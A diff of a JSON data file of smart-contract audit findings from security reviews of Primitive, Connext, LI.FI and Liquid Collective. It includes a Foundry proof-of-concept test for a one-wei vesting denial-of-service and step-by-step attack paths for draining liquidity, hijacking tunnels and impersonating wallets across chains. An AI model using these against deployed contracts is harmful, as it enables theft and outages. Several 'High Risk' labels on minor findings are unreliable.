Given that NatSpec is an important part of code documentation, this affects code comprehension, auditability and usability.", + "title": "findRootForSwappingIn functions should use MINIMUM_INVARIANT_DELTA", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The findRootForSwappingInX and findRootForSwappingInY functions add + 1 to the previous curve invariant: tradingFunction(curve) - (curve.invariant + 1)", "labels": [ "Spearbit", - "LIFI", + "Primitive", "Severity: Informational" ] }, { - "title": "Use nonReentrant modifier in a consistent way", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "executeCallWithTokenViaAxelar of AxelarFacet, zapIn of the contract FusePoolZap and completeBridgeTokensViaStargate() - swapAndCompleteBridgeTokensViaStargate of the StargateFacet don't have a nonReentrant modifier. All other facets that integrate with external contracts do have this modifier. contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { } function executeCallViaAxelar(...) ... { } } contract FusePoolZap { function zapIn(...) ... { } } There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant. This makes the code more difficult to maintain and verify. contract StargateFacet is ILiFi, SwapperV2, ReentrancyGuard { function sgReceive(...) external nonReentrant { ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, receiver); ... } function completeBridgeTokensViaStargate(...) external { ... } } contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function sgReceive(...) external { ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); ... } function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { } }", + "title": "Unused Errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The NormalStrategyLib_UpperPriceLimitReached and NormalStrategyLib_LowerPriceLimitReached errors are not used.", "labels": [ "Spearbit", - "LIFI", + "Primitive", "Severity: Informational" ] }, { - "title": "Typos on the codebase", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Across the codebase, there are typos in the comments. cancelOnwershipTransfer -> cancelOwnershipTransfer. addresss -> address. Conatains -> Contains. Intitiates -> Initiates.", + "title": "getSwapInvariants order output can be 1 instead of 2", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The getSwapInvariants function is used to simulate swaps for the getAmountOut and beforeSwap functions. These functions use an artificial output value of 2 such that the function does not revert.", "labels": [ "Spearbit", - "LIFI", + "Primitive", "Severity: Informational" ] }, { - "title": "Store all error messages in GenericErrors.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The file GenericErrors.sol contains several error messages and is used from most other solidity files. However, several other error messages are defined in the solidity files themselves.
It would be more consistent and easier to maintain to store these in GenericErrors.sol as well. Note: the Periphery contract also contains error messages which are not listed below. Here are the error messages contained in the solidity files: Facets/AcrossFacet.sol:37: error UseWethInstead(); Facets/AmarokFacet.sol:31: error InvalidReceiver(); Facets/ArbitrumBridgeFacet.sol:30: error InvalidReceiver(); Facets/GnosisBridgeFacet.sol:31: error InvalidDstChainId(); Facets/GnosisBridgeFacet.sol:32: error InvalidSendingToken(); Facets/OmniBridgeFacet.sol:27: error InvalidReceiver(); Facets/OptimismBridgeFacet.sol:29: error InvalidReceiver(); Facets/OwnershipFacet.sol:20: error NoNullOwner(); Facets/OwnershipFacet.sol:21: error NewOwnerMustNotBeSelf(); Facets/OwnershipFacet.sol:22: error NoPendingOwnershipTransfer(); Facets/OwnershipFacet.sol:23: error NotPendingOwner(); Facets/PolygonBridgeFacet.sol:28: error InvalidConfig(); Facets/PolygonBridgeFacet.sol:29: error InvalidReceiver(); Facets/StargateFacet.sol:39: error InvalidConfig(); Facets/StargateFacet.sol:40: error InvalidStargateRouter(); Facets/StargateFacet.sol:41: error InvalidCaller(); Facets/WithdrawFacet.sol:20: error NotEnoughBalance(uint256 requested, uint256 available); Facets/WithdrawFacet.sol:21: error WithdrawFailed(); Helpers/ReentrancyGuard.sol:20: error ReentrancyError(); Libraries/LibAccess.sol:18: error UnAuthorized(); Libraries/LibSwap.sol:9: error NoSwapFromZeroBalance();", + "title": "AfterCreate event uses wrong durationSeconds value if pool is perpetual", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The AfterCreate event uses the cached config.durationSeconds value, but the real value the config storage struct is initialized with will be SECONDS_PER_YEAR in the case of perpetual pools.", "labels": [ "Spearbit", - "LIFI", + "Primitive", "Severity: Informational" ] }, { - "title": "A malicious user could DOS a vesting schedule by sending only 1 wei of TLC to the vesting escrow address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "An external user who owns some TLC tokens could DOS the vesting schedule of any user by sending just 1 wei of TLC to the escrow address related to the vesting schedule. By doing that: The creator of the vesting schedule will not be able to revoke the vesting schedule. The beneficiary of the vesting schedule will not be able to release any vested tokens until the end of the vesting schedule. Any external contracts or dApps will not be able to call computeVestingReleasableAmount. In practice, all the functions that internally call _computeVestingReleasableAmount will revert because of an underflow error when called before the vesting schedule ends. The underflow error is thrown because, when called before the schedule ends, _computeVestingReleasableAmount will enter the if (_time < _vestingSchedule.end) branch and will try to compute uint256 releasedAmount = _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) - balanceOf(_escrow); In this case, _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) will always be lower than balanceOf(_escrow) and the contract will revert with an underflow error.
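To make the arithmetic concrete (numbers taken from the scenario and test below):
// With amount = 10 and 1 extra TLC sent to the escrow by the attacker:
// _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) == 10
// balanceOf(_escrow) == 11
// 10 - 11 underflows, so the call reverts under Solidity >= 0.8 checked arithmetic.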
When the vesting period ends, the contract will not enter the if (_time < _vestingSchedule.end) branch and the user will be able to gain the whole vested amount plus the extra amount of TLC sent to the escrow account by the malicious user. Scenario: 1) Bob owns 1 TLC token. 2) Alluvial creates a vesting schedule for Alice like the following example: createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); 3) Bob sends 1 TLC token to the vesting schedule escrow account of the Alice vesting schedule. 4) After the cliff period, Alice should be able to release 1 TLC token. Because now balanceOf(_escrow) is 11, it will underflow as _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) returns 10. Find below a test case showing all three different DOS scenarios: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDOSReleaseVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob sends one token directly to the Escrow contract of Alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); // Cliff period has passed and Alice tries to get the first batch of the vested token vm.warp(block.timestamp + 1 days); vm.prank(alice); // The transaction will revert for UNDERFLOW because now the balance of the escrow has been increased externally vm.expectRevert(stdError.arithmeticError); tlc.releaseVestingSchedule(0); // Warp to the vesting schedule period end vm.warp(block.timestamp + 9 days); // Alice is able to get the whole vesting schedule amount // plus the token sent by the attacker to the escrow contract vm.prank(alice); tlc.releaseVestingSchedule(0); assertEq(tlc.balanceOf(alice), 11); } function testDOSRevokeVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob sends one token directly to the Escrow contract of Alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); // The creator decides to revoke the vesting schedule before the end timestamp // It will throw an underflow error vm.prank(initAccount); vm.expectRevert(stdError.arithmeticError); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 1)); } function testDOSComputeVestingReleasableAmount() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob sends one token directly to the Escrow contract of Alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); vm.expectRevert(stdError.arithmeticError); uint256 releasableAmount = tlc.computeVestingReleasableAmount(0); // Warp to the end of the vesting schedule vm.warp(block.timestamp + 10 days); releasableAmount = tlc.computeVestingReleasableAmount(0); assertEq(releasableAmount, 11); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "title": "Unnecessary fee reserves check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review-July.pdf", + "body": "The fee amount is always taken on the input and the fee percentage is always less than 100%. Therefore, the fee is always less than the input.
The following check should never fail: adjustedInputReserveWad += self.input; // feeAmountUnit <= self.input <= adjustedInputReserveWad if (feeAmountUnit > adjustedInputReserveWad) revert SwapLib_FeeTooHigh();", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Critical Risk" + "Primitive", + "Severity: Informational" ] }, { - "title": "Coverage funds might be pulled not only for the purpose of covering slashing losses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The newly introduced coverage fund is a smart contract that holds ETH to cover a potential lsETH price decrease due to unexpected slashing events. Funds might be pulled from CoverageFundV1 to the River contract through setConsensusLayerData to cover the losses and keep the share price stable. In practice, however, it is possible that these funds will be pulled not only in emergency events. _maxIncrease is used as a measure to enforce the maximum difference between prevTotalEth and postTotalEth, but in practice, it is being used as a mandatory growth factor in the context of coverage funds, which might cause the pulling of funds from the coverage fund to ensure _maxIncrease of revenue in case fees are not high enough.", + "title": "swapInternal() shouldn't use msg.sender", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "As reported by the Connext team, the internal stable swap checks if msg.sender has sufficient funds on execute(). This msg.sender is the relayer, which normally wouldn't have these funds, so the swaps would fail. The local funds should come from the Connext diamond itself. BridgeFacet.sol function execute(ExecuteArgs calldata _args) external nonReentrant whenNotPaused returns (bytes32) { ... (uint256 amountOut, address asset, address local) = _handleExecuteLiquidity(...); ... } function _handleExecuteLiquidity(...) ... { ... (uint256 amount, address adopted) = AssetLogic.swapFromLocalAssetIfNeeded(...); ... } AssetLogic.sol function swapFromLocalAssetIfNeeded(...) ... { ... return _swapAsset(...); } function _swapAsset(...) ... { ... SwapUtils.Swap storage ipool = s.swapStorages[_key]; if (ipool.exists()) { // Swap via the internal pool. return ... ipool.swapInternal(...) ... } } SwapUtils.sol function swapInternal(...) ... { IERC20 tokenFrom = self.pooledTokens[tokenIndexFrom]; require(dx <= tokenFrom.balanceOf(msg.sender), \"more than you own\"); ... } // msg.sender is the relayer", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Consider preventing CoverageFundAddress to be set as address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "In the current implementation of River.setCoverageFund and CoverageFundAddress.set, both functions do not revert when the _newCoverageFund address parameter is equal to address(0). If the Coverage Fund address is empty, the River._pullCoverageFunds function will return earlier and will not pull any coverage fund.", + "title": "MERKLE.insert does not return the updated tree leaf count", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The NatSpec comment for insert is * @return uint256 Updated count (number of nodes in the tree). But that is not true.
If the updated count is 2^k * (2n + 1), where k, n ∈ ℕ ∪ {0}, then the return value would be 2n + 1. Currently, the returned value of insert is not being used; otherwise, this could be a bigger issue.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Medium Risk" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "CoverageFund.initCoverageFundV1 might be front-runnable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Upgradeable contracts are used in the project, mostly relying on a TUPProxy contract. Initializing a contract is a 2-phase process where the first call is the actual deployment and the second call is a call to the init function itself. From our experience with the repository, the upgradeable contracts deployment scripts are using the TUPProxy correctly; however, in that case we were not able to find the deployment script for CoverFund, so we decided to raise this point to make sure you are following the previous policy also for this contract.", + "title": "PolygonSpokeConnector or PolygonHubConnector can get compromised and DoSed if an address(0) is passed to their constructor for _mirrorConnector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "PolygonSpokeConnector (PolygonHubConnector) inherits from SpokeConnector (HubConnector) and FxBaseChildTunnel (FxBaseRootTunnel). When PolygonSpokeConnector (PolygonHubConnector) gets deployed and its constructor is called, if _mirrorConnector == address(0) then setting the mirrorConnector storage variable is skipped: // File: Connector.sol#L118-L121 if (_mirrorConnector != address(0)) { _setMirrorConnector(_mirrorConnector); } Now since setFxRootTunnel (setFxChildTunnel) is an unprotected endpoint that is not overridden by PolygonSpokeConnector (PolygonHubConnector), anyone can call it and assign their own fxRootTunnel (fxChildTunnel) address (note, fxRootTunnel (fxChildTunnel) is supposed to correspond to mirrorConnector on the destination domain). Note that the require statement in setFxRootTunnel (setFxChildTunnel) only allows fxRootTunnel (fxChildTunnel) to be set once (to a non-zero address value), so afterward even the owner cannot update this value. If at some later time the owner tries to call setMirrorConnector to assign the mirrorConnector, since _setMirrorConnector is overridden by PolygonSpokeConnector (PolygonHubConnector), the following will try to execute: // File: PolygonSpokeConnector.sol#L78-L82 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxRootTunnel(_mirrorConnector); } Or for PolygonHubConnector: // File: PolygonHubConnector.sol#L51-L55 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } But this will revert since fxRootTunnel (fxChildTunnel) is already set. Thus if the owner of PolygonSpokeConnector (PolygonHubConnector) does not provide a non-zero address value for mirrorConnector upon deployment, a malicious actor can set fxRootTunnel, which will cause: 1. Rerouting of messages from Polygon to Ethereum to an address decided by the malicious actor (or vice versa for PolygonHubConnector). 2. DoSing the setMirrorConnector and setFxRootTunnel (fxChildTunnel) endpoints for the owner.
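A minimal sketch of why the owner is then locked out (assumed shape of Polygon's FxBaseChildTunnel guard, not the verbatim code):
// Assumed shape of the set-once guard (illustrative):
function setFxRootTunnel(address _fxRootTunnel) external virtual {
    require(fxRootTunnel == address(0), \"FxBaseChildTunnel: ROOT_TUNNEL_ALREADY_SET\");
    fxRootTunnel = _fxRootTunnel;
}
// Once an attacker has called this, the owner's _setMirrorConnector -> setFxRootTunnel path reverts.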
", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Account owner of the minted TLC tokens must call delegate to own vote power of initial minted tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The _account owner of the minted TLC tokens must remember to call tlcToken.delegate(accountOwner) to auto-delegate to itself, otherwise it will have zero voting power. Without doing that, anyone (even with just 1 voting power) could make any proposal pass and in the future manage the DAO, proposing, rejecting or accepting/executing proposals. As the OpenZeppelin ERC20 documentation says: By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked.", + "title": "A malicious owner or user with a Role.Router role can drain a router's liquidity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "A malicious owner or user with the Role.Router role, denominated as A in this example, can drain the liquidity of a current router (a router that has already been added to the system and might potentially have added big liquidity to some assets). Here is how A can do it (can also be done atomically): 1. Remove the router by calling removeRouter. 2. Add the router back by calling setupRouter and set the owner and recipient parameters to accounts A has access to / control over. 3. Loop over all tokens in which the router has liquidity and call removeRouterLiquidityFor to drain/redirect the funds into accounts A has control over. That means all routers would need to put their trust in the owner (of this connext instance) and any user who has a Role.Router role with their liquidity. So the setup is not trustless currently.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Consider using unchecked block to save some gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Because of the if statement, it is impossible for vestedAmount - releasedAmount to underflow, thus allowing the usage of the unchecked block to save a bit of gas.", + "title": "Users are forced to accept any slippage on the destination chain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The documentation mentioned that there is a cancel function on the destination domain that allows users to send the funds back to the origin domain, accepting the loss incurred by slippage from the origin pool. However, this feature is not found in the current codebase. If the high slippage rate persists continuously on the destination domain, the users will be forced to accept the high slippage rate.
Otherwise, their funds will be stuck in Connext.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "createVestingSchedule allows the creation of a vesting schedule that could release zero tokens after a period has passed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "Depending on the value of duration or amount it is possible to create a vesting schedule that would release zero token after a whole period has elapsed. This is an edge case scenario but would still be possible given that createVestingSchedule can be called by anyone and not only Alluvial. See the following test case for an example //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDistributeZeroPerPeriod() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, duration: 365 days, period: 1 days, amount: 100, beneficiary: alice, delegatee: address(0), 15 revocable: true }) ); // One whole period pass and alice check how many tokens she can release vm.warp(block.timestamp + 1 days); uint256 releasable = tlc.computeVestingReleasableAmount(0); assertEq(releasable, 0); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "title": "Preservation of msg.sender in ZkSync could break certain trust assumption", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "For ZkSync chain, the msg.sender is preserved for L1 -> L2 calls. One of the rules when pursuing a cross-chain strategy is to never assume that address control between L1 and L2 is always guaranteed. For EOAs (i.e., non-contract accounts), this is generally true that any account that can be accessed on Ethereum will also be accessible on other EVM-based chains. However, this is not always true for contract-based accounts as the same account/wallet address might be owned by different persons on different chains. 
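The wallet-address collision relies on how CREATE2 derives addresses; a minimal sketch of the standard EVM computation (ZkSync's native derivation differs, so this illustrates the generic EVM case described by the finding):

pragma solidity ^0.8.15;

library Create2Address {
    // address = last 20 bytes of keccak256(0xff ++ factory ++ salt ++ keccak256(initCode))
    function compute(address factory, bytes32 salt, bytes32 initCodeHash) internal pure returns (address) {
        return address(uint160(uint256(keccak256(abi.encodePacked(hex"ff", factory, salt, initCodeHash)))));
    }
}

// With the same factory address, the same user-supplied salt, and the same init
// code on two chains, anyone who replays Alice's inputs obtains, on the other
// chain, the address that Alice controls on the first one.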
This might happen if there is a poorly implemented smart contract wallet factory on multiple EVM-based chains that deterministically deploys a wallet based on some user-defined inputs. For instance, if a smart contract wallet factory deployed on both EVM-based chains uses deterministic CREATE2, which allows users to define its salt when deploying the wallet, Bob might use ABC as the salt on Ethereum and Alice might use ABC as the salt on ZkSync. Both of them will end up getting the same wallet address on two different chains. A similar issue occurred in the Optimism-Wintermute Hack, but the actual incident is more complicated. Assume that 0xABC is a smart contract wallet owned and deployed by Alice on ZkSync chain. Alice performs an xcall from Ethereum to ZkSync with delegate set to the 0xABC address. Thus, on the destination chain (ZkSync), only Alice's smart contract wallet 0xABC is authorized to call functions protected by the onlyDelegate modifier. Bob (the attacker) sees that the 0xABC address is not owned by anyone on Ethereum. Therefore, he proceeds to take ownership of 0xABC by interacting with the wallet factory to deploy a smart contract wallet on the same address on Ethereum. Bob can do so by reusing the inputs that Alice used to create the wallet previously. Thus, Bob can technically make a request from L1 -> L2 to impersonate Alice's wallet (0xABC) and bypass the onlyDelegate modifier on ZkSync. Additionally, Bob could make an L1 -> L2 request by calling ZkSync's BridgeFacet.xcall directly to steal Alice's approved funds. Since the xcall relies on msg.sender, it will assume that the caller is Alice. This issue is specific to the ZkSync chain due to the preservation of msg.sender for L1 -> L2 calls. For the other chains, the msg.sender is not preserved for L1 -> L2 calls and will always point to the L2's AMB forwarding the requests.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "CoverageFund - Checks-Effects-Interactions best practice is violated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "We were not able to find any concrete instances of harmful reentrancy attack vectors in this contract, but it's recommended to follow the Checks-effects-interactions pattern anyway.", + "title": "No way to update a Stable Swap once assigned to a key", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Once a Stable Swap is assigned to a key (the hash of the canonical id and domain for a token), it cannot be updated or deleted. A Swap could be hacked, or an improved version may be released, which would warrant updating the Swap for a key.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "River contract allows setting an empty metadata URI", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The current implementation of River.setMetadataURI and MetadataURI.set both allow the current value of the metadata URI to be updated to an empty string.", + "title": "Renouncing ownership or admin role could affect the normal operation of Connext", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Consider the following scenarios.
Instance 1 - Renouncing ownership All the contracts that extend from ProposedOwnable or ProposedOwnableUpgradeable inherit a method called renounceOwnership. The owner of the contract can use this method to give up their ownership, thereby leaving the contract without an owner. If that were to happen, it would not be possible to perform any owner-specific functionality on that contract anymore. The following is a summary of the affected contracts and their impact if the ownership has been renounced. One of the most significant impacts is that Connext's message system cannot recover after a fraud has been resolved since there is no way to unpause and add the connector back to the system. Instance 2 - Renouncing admin role All the contracts that extend from ProposedOwnableFacet inherit a method called revokeRole. 1. Assume that the Owner has renounced its power and the only Admin remaining used revokeRole to renounce its Admin role. 2. Now the contract is left with no Owner and no Admin. 3. All swap operations collect adminFees via the SwapUtils.sol contract. In the absence of any Admin and Owner, these fees will get stuck in the contract with no way to retrieve them. Normally they would have been withdrawn using withdrawSwapAdminFees (SwapAdminFacet.sol). 4. This is simply one example; there are multiple other critical functionalities impacted once both Admin and Owner revoke their roles.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Consider requiring that the _cliffDuration is a multiple of _period", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "When a vesting schedule is created via _createVestingSchedule, the only check made on _period parameter (other than being greater than zero) is that the _duration must be a multiple of _period. If after the _cliffDuration the user can already release the matured vested tokens, it could make sense to also require that _cliffDuration % _period == 0", + "title": "No way of removing Fraudulent Roots", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Fraudulent Roots cannot be removed once fraud is detected by the Watcher. This means that Fraud Roots will be propagated to each chain.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "Add documentation about the scenario where a vesting schedule can be created in the past", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "In the current implementation of ERC20VestableVotesUpgradeable _createVestingSchedule func- tion, there is no check for the _start value. This means that the creator of a vesting schedule could create a schedule that starts in the past.
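A common mitigation for the renouncement finding above is to disable the inherited renouncement paths entirely; a minimal sketch of such an override (hypothetical, not the audited code):

pragma solidity ^0.8.15;

abstract contract NonRenounceable {
    error Ownable__renounce_disabled();

    // Overrides the inherited renounceOwnership-style endpoint and disables it:
    // fee withdrawal, unpausing, and connector management always need a live owner.
    function renounceOwnership() public virtual /* onlyOwner */ {
        revert Ownable__renounce_disabled();
    }
}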
Allowing the creation of a vesting schedule with a past _start also influences the behavior of _revokeVestingSchedule (see ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked).", + "title": "Large number of inbound roots can DOS the RootManager", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "It is possible to perform a DOS against the RootManager by exploiting the dequeueVerified function or insert function of RootManager.sol. The following describes the possible attack path: 1. Assume that a malicious user calls the permissionless GnosisSpokeConnector.send function 1000 times (or any number of times that will cause an Out-of-Gas error later) within a single transaction/block on Gnosis, causing a large number of Gnosis's outboundRoots to be forwarded to GnosisHubConnector on Ethereum. 2. Since the 1000 outboundRoots were sent in the same transaction/block earlier, all of them should arrive at the GnosisHubConnector within the same block/transaction on Ethereum. 3. For each of the 1000 outboundRoots received, the GnosisHubConnector.processMessage function will be triggered to process it, which will in turn call the RootManager.aggregate function to add the received outboundRoot into the pendingInboundRoots queue. As a result, 1000 outboundRoots with the same commitBlock will be added to the pendingInboundRoots queue. 4. After the delay period, the RootManager.propagate function will be triggered. The function will call the dequeueVerified function to dequeue 1000 verified outboundRoots from the pendingInboundRoots queue by looping through the queue. This might result in an Out-of-Gas error and cause a revert. 5. If the above dequeueVerified function does not revert, the RootManager.propagate function will attempt to insert 1000 verified outboundRoots to the aggregated Merkle tree, which might also result in an Out-of-Gas error and cause a revert. If the RootManager.propagate function reverts when called, the latest aggregated Merkle root cannot be forwarded to the spokes. As a result, none of the messages can be proven and processed on the destination chains. Note: the processing on the Hub (which is on mainnet) can also become very expensive, as mainnet usually has a far higher gas cost than the Spoke.", "labels": [ "Spearbit", - "LiquidCollective2", - "Severity: Informational" + "ConnextNxtp", + "Severity: High Risk" ] }, { - "title": "ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", - "body": "The current implementation of _createVestingSchedule allows the creation of vesting schedules that Start in the past: _start < block.timestamp. Have already ended: _start + _duration < block.timestamp. Because of this behavior, in case of the creation of a past vesting schedule that has already ended The _beneficiary can instantly call (if there's no lock period) releaseVestingSchedule to release the whole amount of tokens. The creator of the vesting schedule cannot call revokeVestingSchedule because the new end would be in the past and the transaction would revert with an InvalidRevokedVestingScheduleEnd error.
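One shape of a fix for the RootManager DOS finding above is to bound the work done per propagate() call; a minimal sketch with assumed names (pendingInboundRoots is simplified to an array; the cap value is hypothetical):

pragma solidity ^0.8.15;

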